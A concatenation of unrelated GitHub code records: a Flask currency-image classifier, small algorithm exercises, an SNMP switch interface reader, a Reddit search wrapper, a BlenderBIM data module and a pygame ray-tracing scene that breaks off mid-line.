Check http://127.0.0.1:5000/')\r\n\r\n\r\n# Model saved with Keras model.save()\r\nMODEL_PATH = 'models/TEST-CNN.h5'\r\n\r\n# Load your own trained model\r\n#model = tf.keras.models.load_model(MODEL_PATH)\r\n#model._make_predict_function() # Necessary\r\n#print('Model loaded. Start serving...')\r\n\r\n\r\ndef prepare(file_path):\r\n print(\"..........................file path \")\r\n print(file_path)\r\n IMGSIZE = 100\r\n Img_array = cv2.imread(file_path, cv2.IMREAD_GRAYSCALE)/255\r\n new_array = cv2.resize(Img_array, (IMGSIZE, IMGSIZE))\r\n\r\n return new_array.reshape(-1, IMGSIZE, IMGSIZE, 1)\r\n\r\n\r\n\r\n\r\ndef model_predict(img, model):\r\n img = img.resize((100, 100))\r\n\r\n # Preprocessing the image\r\n x = image.img_to_array(img)\r\n # x = np.true_divide(x, 255)\r\n x = np.expand_dims(x, axis=0)\r\n\r\n # Be careful how your trained model deals with the input\r\n # otherwise, it won't make correct prediction!\r\n x = preprocess_input(x, mode='tf')\r\n print('###################################')\r\n print(x)\r\n\r\n preds = model.predict(x)\r\n return preds\r\n\r\n\r\n@app.route('/', methods=['GET'])\r\ndef index():\r\n # Main page\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/predict', methods=['GET', 'POST'])\r\ndef predict():\r\n if request.method == 'POST':\r\n # Get the image from post request\r\n img = base64_to_pil(request.json)\r\n\r\n print(img)\r\n\r\n # Save the image to ./uploads\r\n img.save(\"./uploads/image.jpeg\")\r\n\r\n MODEL_PATH = 'models/TEST-CNN.h5'\r\n\r\n # Load your own trained model\r\n model = tf.keras.models.load_model(MODEL_PATH)\r\n testing = model.predict([prepare('./uploads/image.jpeg')])\r\n print('testing........................................................')\r\n print(testing)\r\n result = \"Undefined\"\r\n\r\n CATEGORIES = [\"Dollar\", \"Pound\"]\r\n print([float(testing[0][0])])\r\n print([float(testing[0][1])])\r\n print(CATEGORIES[int(testing[0][0])])\r\n\r\n if float(testing[0][0]) > 0.95:\r\n print(\"One Dollar\")\r\n result =\"One Dollar\"\r\n\r\n elif float(testing[0][0]) < 0.95 and float(testing[0][1]) < 0.05:\r\n print(\"Not Defined\")\r\n result = \"Not Defined\"\r\n\r\n else:\r\n print(\"five Pounds\")\r\n result =\" Five Pounds\"\r\n\r\n pred_proba = \"{:.3f}\".format(np.amax(testing)) # Max probability\r\n\r\n # Serialize the result, you can add additional fields\r\n return jsonify(result=result, probability=pred_proba)\r\n\r\n return None\r\n\r\n\r\nif __name__ == '__main__':\r\n # app.run(port=5002, threaded=False)\r\n\r\n # Serve the app with gevent\r\n http_server = WSGIServer(('0.0.0.0', 5000), app)\r\n http_server.serve_forever()\r\n","repo_name":"charu11/currency-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"858929563","text":"def torreXadrez():\n linha = int(input('Digite a linha: '))\n coluna = int(input('Digite a coluna: '))\n\n #posições na mesma linha\n for i in range(1,9):\n if i != coluna:\n print(f'({linha},{i})',end=',')\n\n #posições na mesma coluna\n for i in range(1,9):\n if i != linha:\n print(f'({i},{coluna})',end=',')\n \n print()\ntorreXadrez()\n ","repo_name":"Vitimfm/Python-Mini-Projects","sub_path":"FUP/Algorithms/Repetição/Questão-20.py","file_name":"Questão-20.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} 
+{"seq_id":"32649486943","text":"n=int(input()) #컴퓨터 수(노드)\nm=int(input()) #연결 수(간선)\nedges=[[0]*(n+1) for _ in range(n+1)]\nfor i in range(m):\n edge=list(map(int,input().split()))\n edges[edge[0]][edge[1]]=1\n edges[edge[1]][edge[0]]=1\n\ndef bfs(node):\n visited=[node]\n queue=[node]\n while queue:\n cur_node=queue.pop(0)\n for next_node in range(n+1):\n if edges[cur_node][next_node]==1 and (next_node not in visited):\n visited.append(next_node)\n queue.append(next_node)\n return visited\n\nprint(len(bfs(1))-1)\n","repo_name":"askges20/baekjoon_code","sub_path":"DFS와 BFS/2606번 바이러스.py","file_name":"2606번 바이러스.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"5781059468","text":"class Processor:\r\n def __init__(self, cores_amount, frequency, cash_size):\r\n self.cores_amount = cores_amount\r\n self.frequency = frequency\r\n self.cash_size = cash_size\r\n\r\nclass Graph_processor:\r\n def __init__(self, frequency, video_memory_size):\r\n self.frequency = frequency\r\n self.video_memory_size = video_memory_size\r\n\r\nclass HDD:\r\n def __init__(self, motor_velocity, memory_size):\r\n self.motor_velocity = motor_velocity\r\n self.memory_size = memory_size\r\n\r\nclass Mother_board:\r\n def __init__(self, socket, chipset, front_side_bus):\r\n self.socket = socket\r\n self.chipset = chipset\r\n self.front_side_bus = front_side_bus\r\n\r\nclass Battery:\r\n def __init__(self, capacity, material_type, power):\r\n self.capacity = capacity\r\n self.material_type = material_type\r\n self.power = power\r\n\r\nclass Case:\r\n def __init__(self, colour, material, hightness, lenght_horizontal, lenght_vertical):\r\n self.colour = colour\r\n self.material = material\r\n self.hightness = hightness\r\n self.lenght_horizontal = lenght_horizontal\r\n self.lenght_vertical = lenght_vertical\r\n\r\nclass Display:\r\n def __init__(self, diagonal, matrix_type, density):\r\n self.diagonal = diagonal\r\n self.matrix_type = matrix_type\r\n self.density = density\r\n\r\nclass Keyboard:\r\n def __init__(self, key_travel, keyboard_type):\r\n self.key_travel = key_travel\r\n self.keyboard_type = keyboard_type\r\n\r\nclass Info:\r\n def __init__(self, firm, seller, serial_number, description):\r\n self.firm = firm\r\n self.seller = seller\r\n self.serial_number = serial_number\r\n self.description = description\r\n\r\n\r\n#-----------------------------------------------------------------------------------\r\n\r\nclass Notebook:\r\n def __init__(self, processor, graph_processor, hdd, mother_board, battery, case, display, keyboard, info):\r\n self.processor = processor\r\n self.graph_processor = graph_processor\r\n self.hdd = hdd\r\n self.mother_board = mother_board\r\n self.battery = battery\r\n self.case = case\r\n self.display = display\r\n self.keyboard = keyboard\r\n self.info = info\r\n\r\nasus = Notebook(processor = Processor(cores_amount=2, frequency=4.5, cash_size=50),\r\n graph_processor = Graph_processor(frequency=1.2, video_memory_size=2),\r\n hdd = HDD(motor_velocity=7600, memory_size=960),\r\n mother_board = Mother_board(socket=\"AM4\", chipset=\"H110\", front_side_bus=256),\r\n battery = Battery(capacity=2600, material_type=\"li-on\", power=80),\r\n case = Case(colour=\"black\", material=\"aluminium, plastic\", hightness=3, lenght_horizontal=40, lenght_vertical=25),\r\n display = Display(diagonal=15.6, matrix_type=\"TS\", density=\"1280x720\"),\r\n keyboard = Keyboard(key_travel=0.4, 
keyboard_type=\"membran\"),\r\n info = Info(firm=\"ASUS\", seller=\"Rozetka\", serial_number=\"C12353MN\", description=\"Best notebook for 300 hohlo-baksiv\"))\r\n\r\n\r\n","repo_name":"OneGraund/test","sub_path":"04_12/06_12.py","file_name":"06_12.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"71217117670","text":"\"\"\"Ubiquiti Unifi Switch with it's messy snmp walk behavior\"\"\"\n__author__ = \"Zacharias El Banna\"\n__type__ = \"network\"\n__icon__ = \"viz-ex.png\"\n__oid__ = 8072\n\nfrom rims.devices.generic import Device as GenericDevice\nfrom rims.core.common import Session, VarList\n\nclass Device(GenericDevice):\n\n def __init__(self, aRT, aID, aIP = None):\n GenericDevice.__init__(self, aRT, aID, aIP)\n\n # Name decoding according to how LLDP sees 'this' machine\n def name_decode(self, aName):\n name = aName.split()\n if name[0] == 'Slot:':\n return \"%s/%s\"%(name[1],name[3])\n elif name[0] == 'Switch':\n return \"Port %s\"%(name[4])\n elif name[0] == 'CPU' and name[3] == 'Slot:':\n return \"irb\"\n else:\n return ' '.join(name)\n\n def interfaces(self):\n interfaces = {}\n try:\n session = Session(Version = 2, DestHost = self._ip, Community = self._rt.config['snmp']['read'], UseNumeric = 1, Timeout = int(self._rt.config['snmp'].get('timeout',100000)), Retries = 2)\n macs = VarList('.1.3.6.1.2.1.2.2.1.6')\n session.walk(macs)\n for mac in macs:\n entry = VarList('.1.3.6.1.2.1.2.2.1.2.%s'%mac.iid,'.1.3.6.1.2.1.2.2.1.8.%s'%mac.iid,'.1.3.6.1.2.1.31.1.1.1.18.%s'%mac.iid)\n session.get(entry)\n interfaces[int(mac.iid)] = {'mac':':'.join(\"%s%s\"%x for x in zip(*[iter(mac.val.hex())]*2)).upper() if mac.val else \"00:00:00:00:00:00\", 'name':self.name_decode(entry[0].val.decode()),'state':'up' if entry[1].val.decode() == '1' else 'down','description':entry[2].val.decode() if entry[2].val.decode() != \"\" else \"None\"}\n except: pass\n return interfaces\n\n def interface(self, aIndex):\n try:\n session = Session(Version = 2, DestHost = self._ip, Community = self._rt.config['snmp']['read'], UseNumeric = 1, Timeout = int(self._rt.config['snmp'].get('timeout',100000)), Retries = 2)\n entry = VarList('.1.3.6.1.2.1.2.2.1.2.%s'%aIndex,'.1.3.6.1.2.1.31.1.1.1.18.%s'%aIndex,'.1.3.6.1.2.1.2.2.1.6.%s'%aIndex)\n session.get(entry)\n except Exception as e:\n ret = {'status':'NOT_OK','info':repr(e)}\n else:\n ret = {'status':'OK','data':{'mac':':'.join(\"%s%s\"%x for x in zip(*[iter(entry[2].val.hex())]*2)).upper() if entry[2].val else \"00:00:00:00:00:00\", 'name':self.name_decode(entry[0].val.decode()), 'description':entry[1].val.decode() if entry[1].val.decode() != \"\" else \"None\"}}\n return ret\n","repo_name":"zelbanna/rims","sub_path":"devices/unifi_switch.py","file_name":"unifi_switch.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"30242321424","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n#Importar librerias necesarias para el funcionamiento de Python\nimport sqlite3\nimport pandas as pd\n\n# Crear conexion SQL desde python a la BD del ejercicio\ncon = sqlite3.connect(\"database.sqlite\")\ncur = con.cursor()\n\n# Cargar resultados de la SQL Query al Data Frame best_player en python, la query esta generada en base a un JOIN ON.\ncon = sqlite3.connect(\"database.sqlite\")\ndf_best_player = pd.read_sql_query(\"SELECT player_name, birthday, height, weight, 
overall_rating, potential, preferred_foot, attacking_work_rate, defensive_work_rate, ball_control, positioning, stamina, strength, dribbling, vision, aggression FROM player INNER JOIN Player_Attributes on player.player_api_id = player_attributes.player_api_id\", con)\n#Formatear Cabeceras de listado\ndf_best_player.columns = ['PLAYER NAME','BIRTHDAY','HEIGHT','WEIGHT','OVERALL_RATING',\n 'POTENTIAL','PREFERRED_FOOT','ATTACKING_WORK_RATE','DEFENSIVE_WORK_RATE','BALL_CONTROL','POSITIONING','STAMINA','STRENGTH','DRIBBLING','VISION','AGGRESSION']\n \ndf_best_player.info()\ndf_best_player.head()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"RAGBouch94/Challenge-T-cnico","sub_path":"4.Detalle Jugadores_DataFrame.py","file_name":"4.Detalle Jugadores_DataFrame.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"33709448978","text":"a=[2,6,22,2,2,2,2,2,21,6,3,2,8,2,1]\n#a=[4,7,4,4,7,4,4,9,4,3]\ncount=0\nfor i in a:\n if count==0:\n candidate=i\n count=1\n continue\n else:\n if candidate==i:\n count+=1\n else:\n count-=1\n\nif count==0:\n exit(0)\n\ncount=0\n\nfor i in a:\n if i==candidate:\n count+=1\n\nif count>=len(a)//2:\n print(candidate)\nelse:\n exit(0)","repo_name":"sauravgupta2800/MyCodingPractice","sub_path":"ideserve/majority_element_in_array.py","file_name":"majority_element_in_array.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"27381336961","text":"import logging\nfrom flask import Flask, request, Response\nfrom calculation.calculation import resolve_calculation\n\nlogger = logging.getLogger(__name__)\n\napp = Flask(__name__)\n\n@app.route(\"/calculate\", methods=[\"GET\"])\ndef calculate():\n notation = request.args.get('notation', 'prefix')\n calculation = request.args.get('calculation')\n if calculation is None:\n return 'No calculation specified', 400\n try:\n return str(resolve_calculation(calculation, notation=notation))\n except Exception as e:\n logger.warning(\n f'Calculation request for {calculation} failed with \"{e}\"'\n )\n return 'Calculation Error', 400\n","repo_name":"capable-dragonfly/kheiron-technical-challenge","sub_path":"service/calculator_service.py","file_name":"calculator_service.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"8131487142","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.left = None\n self.right = None\n self.parent = None\n\n\"\"\"\n implement insert, delete, find next, find prev\n find min and find max \n source: https://www.techiedelight.com/inorder-tree-traversal-iterative-recursive/\n\"\"\"\n\n\n\ndef findMaxIter(root):\n while True:\n if root.right == None:\n return root.data\n else:\n root = root.right\n\ndef findMinIter(root):\n while True:\n if root.left == None:\n return root.data\n else:\n root = root.left\n\n\ndef findNext(root, n):\n #in order traversal\n\n minNum = findMinIter(root)\n maxNum = findMaxIter(root)\n\n if (n == minNum or n == maxNum):\n return -1\n\n while True:\n if root.right == None:\n return root.data\n else:\n root = root.right\n\n # return arr[arr.index(n) + 1]\n\ndef findPrev(root, n):\n #in order traversal\n minNum = findMinIter(root)\n maxNum = findMaxIter(root)\n\n if (n == minNum or n == maxNum):\n return -1\n\n while True:\n if root.left == None:\n return root.parent.data\n 
else:\n root = root.left\n\n\ndef insertIter(root, num):\n if root == None: \n root = num\n else:\n while True:\n if root.data < num.data:\n if root.right == None:\n root.right = num\n root.right.parent = root\n break\n else:\n root = root.right\n elif root.data > num.data:\n if root.left == None:\n root.left = num\n root.left.parent = root\n break\n else:\n root = root.left\n\ndef inOrder(n):\n if n:\n inOrder(n.left)\n print(n.data, end = \" \")\n inOrder(n.right)\n\n\ndef deleteRec(root, num):\n while True:\n if root == None:\n return root\n elif (num < root.data):\n root = root.left\n \n elif (num > root.data):\n root = root.right \n else:\n if (root.left == None and root.right == None):\n root = None\n return root\n elif (root.left == None):\n temp = root.right\n root = None\n return temp\n elif (root.right == None):\n temp = root.left\n root = None\n return temp\n else:\n temp = findMinIter(root)\n root.data = temp\n num = temp\n root = root.right \n return root\n\nn = Node(21)\ninsertIter(n, Node(12))\ninsertIter(n, Node(30))\ninsertIter(n, Node(112))\n\ninOrder(n)\nprint()\nprint(\"max\", findMaxIter(n))\nprint(\"min\", findMinIter(n))\n\nprint(\"next 30\", findNext(n, 30))\nprint(\"prev 30\", findPrev(n, 30))\n\nprint(\"delete 30\")\nn = deleteRec(n, 30)\ninOrder(n)\nprint()\n","repo_name":"jonebdev/AVLtree","sub_path":"part1/problem1d.py","file_name":"problem1d.py","file_ext":"py","file_size_in_byte":3004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"42037796757","text":"import time\nimport os\nfrom typing import Generator\nimport requests\nimport loguru\n\nREDDIT_RATE_LIMIT = 2 # seconds\nMAX_QUERY_LENGTH = 512\nMAX_LISTING_LIMIT = 100\nBASE_URL = \"https://reddit.com\"\n\n\nclass RedditWrapper:\n \"\"\"\n Wrapper for very basic search API interaction\n \"\"\"\n\n user_agent=f\"Ubuntu(20.04):test-app:v0.1\"\n \n def generate_searches(\n self, \n search_term: str,\n subreddit: str = None,\n period: str = None,\n limit: int = None,\n sort: str = None\n ) -> Generator[dict, None, None]:\n \"\"\"\n Generate a stream of \n [listing](https://www.reddit.com/dev/api#listings) objects\n that match a given search term.\n\n Each time next() is called on the generator returned from\n this method, this componenta will search for an updated list\n of listings. 
If there is no update then the same list as before is \n returned.\n \"\"\"\n #defaults - not in func args to allow for defaultdict in sse\n period = \"hour\" if not period else period\n limit = 5 if not limit else limit\n sort = \"new\" if not sort else sort\n\n subredlnk = f\"r/{subreddit}\" if subreddit else \"\"\n url = f\"{BASE_URL}/{subredlnk}/search.json\"\n q = search_term\n if len(search_term) > MAX_QUERY_LENGTH:\n raise ValueError(\n f\"Search term is too long - reduce to {MAX_QUERY_LENGTH}\"\n \" characters.\"\n )\n t = period\n limit = limit\n headers = {\"User-Agent\": self.user_agent}\n params = {\n \"q\": q,\n \"t\": t,\n \"limit\": limit,\n \"sort\": sort\n }\n last_called_time = time.time()\n while True:\n while time.time() - last_called_time < REDDIT_RATE_LIMIT:\n time.sleep(REDDIT_RATE_LIMIT - (time.time() - last_called_time))\n last_called_time = time.time()\n r = requests.get(\n url,\n headers=headers,\n params=params\n )\n api_ret = r.json()\n \n yield api_ret['data']['children']","repo_name":"nicelgueta/e3-utils","sub_path":"e3utils/cnxns/reddit.py","file_name":"reddit.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"32147048649","text":"import os\nimport hashlib\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = \n# Simulation Scripts\n# = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = \ndef compute_trajectories(AEi, init_values, Tmax=1000):\n qtrajs = []; fprs = []\n lenq = len(init_values)\n for qi, q0 in enumerate(init_values):\n print('\\r ', np.round(qi/lenq, 4), end='')\n q = q0.copy()\n \n qtraj, fpr = AEi.compute_trajectory(q, Tmax=Tmax,\n tolerance=10e-4, EpsMin=10e-4)\n \n qtrajs.append( qtraj )\n fprs.append( fpr )\n\n print()\n print('Computed', len(qtrajs), 'trajectories')\n \n return qtrajs, fprs\n\ndef check_run(qtrajs, fprs=None):\n if fprs is not None:\n print('Unique fixed points reached:', np.unique(fprs))\n plt.hist([len(traj) for traj in qtrajs], bins=20);\n plt.title('Histrogram of trajectories lengths')\n\n\n\ndef obtain_simdata(AEi, init_values, verbose=1, Tmax=1000):\n fn = 'data/' + AEi.id()\n fn += '_' + str(_transform_tensor_into_hash(init_values))\n fn += '.npz'\n \n try:\n dat = np.load(fn, allow_pickle=True)\n ddic = dict(zip((k for k in dat), (dat[k] for k in dat)))\n print(\"Loading \", fn) if verbose else None\n \n except:\n print(\"Computing \", fn) if verbose else None\n qtrajs, fprs = compute_trajectories(AEi, init_values, Tmax=Tmax)\n check_run(qtrajs, fprs)\n # rtrajs = obtain_rewards(AEi, πtrajs)\n \n ddic = dict(qtrajs=qtrajs, fprs=fprs)\n np.savez_compressed(fn, **ddic)\n dat = np.load(fn, allow_pickle=True)\n ddic = dict(zip((k for k in dat), (dat[k] for k in dat)))\n \n return ddic\n\n\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \n# helpers for the helpers\n# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ndef _transform_tensor_into_hash(tens):\n \"\"\"Transform tens into a string for filename saving\"\"\"\n r = int(hashlib.sha512(str(tens).encode('utf-8')).hexdigest()[:16], 16)\n return r\n\ndef _refine_datafolder(datafolder):\n \"\"\"Check and refine datafolder path\"\"\"\n df = os.path.expanduser(datafolder)\n df += '/' if df[-1] != '/' else '' # make sure path ends as folders do\n return df","repo_name":"wbarfuss/intrinsic-fluctuations-cooperation","sub_path":"2_Learnability/aux_functions.py","file_name":"aux_functions.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"23923161823","text":"import bpy\nimport ifcopenshell.util.type\nimport ifcopenshell.util.element\nfrom ifcopenshell.util.doc import get_entity_doc\nimport blenderbim.tool as tool\n\n\ndef refresh():\n    TypeData.is_loaded = False\n\n\nclass TypeData:\n    data = {}\n    is_loaded = False\n\n    @classmethod\n    def load(cls):\n        cls.is_loaded = True\n        # These two are loaded discretely because relating_types depends on relating_type_classes\n        cls.data[\"relating_type_classes\"] = cls.relating_type_classes()\n        cls.data[\"relating_types\"] = cls.relating_types()\n        cls.data.update(\n            {\n                \"is_product\": cls.is_product(),\n                \"total_instances\": cls.total_instances(),\n                \"relating_type\": cls.relating_type(),\n            }\n        )\n\n    @classmethod\n    def relating_type_classes(cls):\n        results = []\n        obj = bpy.context.active_object\n        if not obj:\n            return\n        element = tool.Ifc.get_entity(obj)\n        if not element:\n            return []\n        version = tool.Ifc.get_schema()\n        types = ifcopenshell.util.type.get_applicable_types(element.is_a(), schema=version)\n        if element.is_a(\"IfcAnnotation\"):\n            types.append(\"IfcTypeProduct\")\n        results.extend((t, t, get_entity_doc(version, t).get(\"description\", \"\")) for t in types)\n        return results\n\n    @classmethod\n    def relating_types(cls):\n        relating_type_classes = cls.relating_type_classes()\n        if not relating_type_classes:\n            return []\n        results = []\n        relating_type_class = bpy.context.active_object.BIMTypeProperties.relating_type_class\n        if not relating_type_class and relating_type_classes:\n            relating_type_class = relating_type_classes[0][0]\n        elements = tool.Ifc.get().by_type(relating_type_class)\n        elements = [(str(e.id()), e.Name or \"Unnamed\", \"\") for e in elements]\n        results.extend(sorted(elements, key=lambda s: s[1]))\n        return results\n\n    @classmethod\n    def is_product(cls):\n        element = tool.Ifc.get_entity(bpy.context.active_object)\n        return element.is_a(\"IfcProduct\")\n\n    @classmethod\n    def total_instances(cls):\n        element = tool.Ifc.get_entity(bpy.context.active_object)\n        return str(len(ifcopenshell.util.element.get_types(element)))\n\n    @classmethod\n    def relating_type(cls):\n        element = tool.Ifc.get_entity(bpy.context.active_object)\n        element_type = ifcopenshell.util.element.get_type(element)\n        if element_type:\n            return {\"id\": element_type.id(), \"name\": f\"{element_type.is_a()}/{element_type.Name or 'Unnamed'}\"}\n","repo_name":"IfcOpenShell/IfcOpenShell","sub_path":"src/blenderbim/blenderbim/bim/module/type/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","stars":1412,"dataset":"github-code","pt":"71"}
+{"seq_id":"11716867089","text":"import pygame\nfrom pygame.locals import *\nfrom rt import RayTracer\nfrom figures import *\nfrom lights import *\nfrom materials import *\nfrom math import*\n\nwidth = 1500\nheight = 650\npygame.init()\nscreen = pygame.display.set_mode((width, height), pygame.DOUBLEBUF | pygame.HWACCEL | pygame.HWSURFACE)\nscreen.set_alpha(None)\n\nraytracer = RayTracer(screen)\nraytracer.envMap = pygame.image.load(\"cielo.png\")\nraytracer.rtClearColor(0.25, 0.25, 0.25)\n\nbrick = Material(diffuse=(0, 0, 1), spec=8, Ks=0.01, matType=TRANSPARENT)\n\ngrass = Material(diffuse=(0.4, 1, 0.4), spec=32, Ks=0.1,matType=REFLECTIVE)\npiel = Material(diffuse=(157/255, 126/255, 61/255), spec=256, Ks=0.2, matType=OPAQUE)\n\nwhite_opaque = Material(diffuse=(1, 1, 1), spec=256, Ks=0.2, matType=OPAQUE)\nboxTexture=pygame.image.load(\"ros.jpg\")\nbox=Material(texture=boxTexture)\nmirror = Material(diffuse=(0.9, 0.9, 0.9), spec=64, Ks=0.2, matType=OPAQUE)\nglass = Material(diffuse=(0.9, 0.9, 0.9), spec=64, Ks=0.15, ior=1.5, matType=TRANSPARENT)\ndiamond = Material(diffuse=(0.5, 0.9, 1), spec=128, Ks=0.2, ior=2.417, matType=TRANSPARENT)\nregalo = Material(diffuse=(0.5, 0.9, 1), spec=128, Ks=0.2, ior=2.417, matType=REFLECTIVE)\n\nfloor_material = Material(diffuse=(1, 0.4, 0.4), spec=8, Ks=0.01, matType=REFLECTIVE)  # Rojo\nceiling_material = Material(diffuse=(0.4, 1, 0.4), spec=32, Ks=0.1, matType=REFLECTIVE)  # Verde\nfront_wall_material = Material(diffuse=(0.4, 0.4, 1), spec=256, Ks=0.2, matType=OPAQUE)  # Azul\nleft_wall_material = Material(diffuse=(1, 1, 0), spec=64, Ks=0.2, matType=OPAQUE)  # Amarillo\nright_wall_material = Material(diffuse=(1, 0, 1), spec=64, Ks=0.15, matType=TRANSPARENT)  # Morado\n\nboca = Material(diffuse=(197/255, 178/255, 137/255), spec=256, Ks=0.2, matType=OPAQUE)\n\nojos = Material(diffuse=(0, 0, 0), spec=256, Ks=0.2, matType=REFLECTIVE)\n\n\n\nraytracer.camPosition=[0, 0.5, 0.75]\ndef rotation_y_matrix(angle):\n    \"\"\" Devuelve una matriz de rotación alrededor del eje Y. \"\"\"\n    c = cos(angle)\n    s = sin(angle)\n\n    return [\n        [c, 0, s],\n        [0, 1, 0],\n        [-s, 0, c]\n    ]\n\n\n\nhorizontal_body_position = (0, 1, -4) \nhorizontal_body_radii = (0.65, 0.57, 0.7) \nhorizontal_body_material = brick\nraytracer.scene.append(Ellipsoid(position=horizontal_body_position, radii=horizontal_body_radii, material=piel))\nhorizontal_body_position1 = (0, 2, -3) \nhorizontal_body_radii1 = (0.256, 0.185, 0.5) \nhorizontal_body_material1 = brick\nraytracer.scene.append(Ellipsoid(position=horizontal_body_position1, radii=horizontal_body_radii1, material=boca))\n\nleft_ear_position = (-0.7, 1.37, -4.1)\nright_ear_position = (0.7, 1.37, -4.1)\near_radii = (0.2, 0.2, 0.2)\n\nraytracer.scene.append(Sphere(position=left_ear_position, radius=0.3, material=boca))\nraytracer.scene.append(Sphere(position=right_ear_position, radius=0.3, material=boca))\nleft_eye_position = (-0.18, 0.55, -1.8)\nright_eye_position = (0.18, 0.55, -1.8)\n\nraytracer.scene.append(Sphere(position=left_eye_position, radius=0.1/2, material=ojos))\nraytracer.scene.append(Sphere(position=right_eye_position, radius=0.1/2, material=ojos))\n\nnariz = Material(diffuse=(0, 0, 0), spec=256, Ks=0.2, matType=REFLECTIVE)\n\n# Posición de la nariz\nnose_position = (0, 0.4, -1.7) \nraytracer.scene.append(Sphere(position=nose_position, radius=0.05, material=nariz))\n\n# Cuerpo del osito\nbody_position = (0, -0.75, -4) \nbody_radii = (0.75, 0.8, 1) \nbody_material = brick\nraytracer.scene.append(Ellipsoid(position=body_position, radii=body_radii, material=piel))\nwhite_belly = Material(diffuse=(1, 1, 1), spec=256, Ks=0.2, matType=OPAQUE)\nbelly_position = (0, 0, -3.8) \n\n\n# Brazo izquierdo\nleft_arm_position = (1.8, 7.5, -3.9) \nleft_arm_radii = (0.5/5, 0.25/5, 0.25/5) \nleft_arm_material = brick\nraytracer.scene.append(Ellipsoid(position=left_arm_position, radii=left_arm_radii, material=piel))\n\n# Brazo derecho\nright_arm_position = (-1.8, 7.5, -4.1) \nright_arm_radii = (0.5/5, 0.25/5, 0.25/5) \nright_arm_material = brick\nraytracer.scene.append(Ellipsoid(position=right_arm_position, radii=right_arm_radii, material=piel))\n\nraytracer.scene.append(Ellipsoid(position=(-1.8, 2.5, -4.1), radii=(0.4/5, 0.25/5, 0.25/5), material=piel))\nraytracer.scene.append(Ellipsoid(position=(1.8, 2.5, -4.1), radii=(0.4/5, 0.25/5, 0.25/5), material=piel))\n# Parámetros para el OBB\nobb_position = [0, 0.006, 0] \nobb_size = [0.25, 0.25, 0.25] \nobb_rotation_matrix = [ \n    [1, 0, 0],\n    [0, 1, 0],\n    [0, 0, 1]\n]\nobb_material = brick \n\n#raytracer.scene.append(OBB(position=obb_position, size=obb_size, rotation_matrix=obb_rotation_matrix, material=obb_material))\n\n\nraytracer.scene.append(Ellipsoid(position=(4, 1, -5), radii=(0.7, 1, 1), material=Material(diffuse=(226/255, 187/255, 192/255), spec=64, Ks=0.2, matType=OPAQUE)))\nraytracer.scene.append(Ellipsoid(position=(6.2, 1, -5), radii=(0.7, 1, 1.1), material=Material(diffuse=(170/255, 209/255, 210/255), spec=64, Ks=0.2, matType=OPAQUE)))\nraytracer.scene.append(Ellipsoid(position=(5, 1.9, -7), radii=(1.7, 2.2, 1.7), material=Material(diffuse=(226/255, 187/255, 192/255), spec=64, Ks=0.2, matType=REFLECTIVE)))\nraytracer.scene.append(Ellipsoid(position=(4, 2.5, -8), radii=(1.8, 2.4, 1.7), material=Material(diffuse=(226/255, 187/255, 192/255), spec=64, Ks=0.2, matType=OPAQUE)))\nraytracer.scene.append(Ellipsoid(position=(2.2, 2, -7), radii=(1.7, 2.2, 1.7), material=Material(diffuse=(170/255, 209/255, 210/255), spec=64, Ks=0.2, matType=REFLECTIVE)))\n#raytracer.scene.append(Ellipsoid(position=(7.5, 1.75, -2), radii=(0.15, 0.9, 0.9), material=Material(diffuse=(170/255, 209/255, 210/255), spec=64, Ks=0.2, matType=OPAQUE)))\nraytracer.scene.append(Ellipsoid(position=(9.5, 1.8, -7), \n                                 radii=(1.3, 2.3, 1.7), \n                                 material=Material(diffuse=(158/255, 104/255, 39/255), \n                                                   spec=64, \n                                                   Ks=0.2, \n                                                   \n                                                   matType=OPAQUE)))\ncilindro_position = (9, 0, -8) \ncilindro_radius = 0.5/10 \ncilindro_height = 8 \ncilindro_material = brick \n\n\n\nraytracer.scene.append(ThinCylinder(position=(9, 0, -8.5), radius=0.5/10, height=8, material=white_opaque))\nraytracer.scene.append(ThinCylinder(position=(9, 0, -11.5), radius=0.5/10, height=8, material=white_opaque))\nraytracer.scene.append(ThinCylinder(position=(9, -1, -13), radius=0.5/10, height=8, material=white_opaque))\nraytracer.scene.append(ThinCylinder(position=(9, -3, -15.5), radius=0.5/10, height=8, material=white_opaque))\nraytracer.scene.append(ThinCylinder(position=(9, -4, -17.5), radius=0.5/10, height=8, material=white_opaque))\nraytracer.scene.append(ThinCylinder(position=(9, 0.4, -28.75\n                                              